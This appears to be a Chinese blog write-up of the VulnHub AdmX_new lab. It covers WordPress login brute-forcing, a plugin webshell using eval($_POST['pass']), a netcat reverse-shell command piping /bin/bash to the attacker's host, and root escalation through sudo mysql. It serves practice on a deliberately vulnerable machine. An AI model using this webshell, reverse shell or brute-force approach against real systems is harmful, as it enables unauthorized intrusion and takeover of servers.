xiaomao

取法乎上,仅得其中
取法乎中,仅得其下

首页 归档 标签 关于

0x04-VulnHub靶机-AdmX_new

2024-03-02 5 min read # vulnhub # 打靶

环境

0x04
地址:https://download.vulnhub.com/admx/AdmX_new.7z

用 virtualbox打开 而且要去修改一下 https://mp.weixin.qq.com/s/9nuapORqlcYPl-Fo9am9fQ

难度=>中

内容

  • BurpSuite内容替换
  • 密码爆破 (我的字典太小了 没爆破出来 )
  • Wordpress后台漏洞利用
  • 利用MySQL提权(sudo+执行系统命令)

操作

信息收集

主机收集搞了半天 东有问题 西有问题啊 真难顶啊

然后本来好了 我以为是扫到我虚拟机了 就开了个80

image-20240301201205430

扫一下目录

image-20240301202339182

存在wordpress

http://192.168.3.95/tools/adminer.php 感觉后面应该用得到 找到他的账号密码 这种是可以直接连的 一般情况mysql是不支持外连 而这种不算外连

image-20240301202528226

这个页面很奇怪啊 而且很卡 为什么这么久都没完整加载上来 用burp 看看整个过程是怎么样的

image-20240301203141790

看到另外一个ip 去访问http://192.168.3.95/wordpress/的过程中 访问了很多次 这个ip 192.168.159.145(访问不到) 这就是页面奇怪 卡的原因 (这个的原因是因为我们前期修改了环境)

image-20240301204729836
image-20240301205041842

在burp 上修改

这些个东西是从目标服务器给客户端浏览器的返回的数据硬编码写入的

所以改 response header 响应头 response body 响应包

image-20240302095629523

就变成了这个样子了

image-20240301210208173

这些都变了

image-20240301210352462

然后往下渗透 可以看到版本 但是去找 也没什么可以利用的

image-20240301210459835

这个登录界面 当我输入admin时候的提示

image-20240301211055036

当我输入admin1213123时

image-20240301211127341

说明 admin账号是存在的 而且没有啥验证 所以就利用 burp 进行爆破

而且密码也没进行加密 更加利于爆破了

image-20240301211308038

但是爆破不出来 (笑死 我的字典太垃圾了) 能够爆破出来的 adam14

渗透

进入后台 可以看到

image-20240302100408169

wordpress后台

一般wordpress获取shell有三种方式

通过media上传shell文件,但是需要特定的漏洞版本

修改主题php代码 上传一句话(蚁剑)image-20240302101047216

第三种方法是使用plugins功能,安装一个我们编写的webshell 插件。在这里我新建了一个webshell.php的文件,并且压缩成zip格式,上传至WordPress的plugins处进行安装,并点击activa plugin进行激活插件。

使用第二种,在主题元素进行插入,如果上传成功,直接访问404.php,拿到shell,但结果是上传一句话时,点击更新,系统提示更改失败

试图修改已有的plugins代码 更新不了 所以自己上传个plugins (这里也可以用msf 来拿shell)

image-20240302101756214
//前面这些注释要有 才能够导入 
<?php

/*

Plugin Name: Webshell

Plugin URI: https://github.com/171/

Description: Wordpress Webshell for Pentest

Version: 1.0

Author: 123

Author URI: https://github.com/171/

License: https://github.com/171/

*/

eval($_POST["pass"]);
//system($_GET['cmd']); 也可以这样  这样就是用nc  python 去反弹shell了 没蚁剑 哥斯拉的shell好 
?>
image-20240302101947382
image-20240302103128800

找到地址 好像是访问哪个路径都可以的

image-20240302103829191

然后用哥斯拉去连接 权限不够 需要提权。

image-20240302103930644

试图udf提权

sudo suid都没有

用 cat /passwd 发现还有个用户

image-20240302105100149
image-20240302105216531

翻到个数据库配置文件 首先想到去登录刚开始发现的那个登录页面

image-20240302105544690

尝试在后台页面 用sql语句写入一个后门代码 想着可能两个shell的权限会不一样 试了几种写法但是都写不进去

https://xz.aliyun.com/t/11225

image-20240302111939194

试图连接上工具 然后看看能不能udf提权 结果 我冰蝎的🐎 连上去了 但是工具连不上

image-20240302113644537

提权2

开始收集了个用户 wpadmin 还有一个进后台的密码 一个数据库密码 试试能不能su进去

但是在哥斯拉上 这个会话不是交互式的 su 不了(不可以输入密码 ) 所以我反弹到kali上 我需要反弹会话到kali

在这个会话 可以su到wpadmin 然后再看看那个home中wpadmin下面的是什么 得到第一个flag (也可以试试那两个密码可不可以su到root)

image-20240302124436690

下一步提到root 看看 sudo -l 发现一个mysql命令 不需要密码就可以 以root执行

image-20240302124948688

sudo mysql -u root -D wordpress -p // 要加个sudo

然后再用nc反弹一下 /bin/bash | nc 192.168.3.87 6768 (可以用nc串联的 )

这样也行

image-20240302131229085

总结

直接尝试的udf提权不行诶 用冰蝎做了代理 还是搞不了

先用简单 易操作的方法提权 实在不行再用那种操作复杂的

Powered by Gridea RSS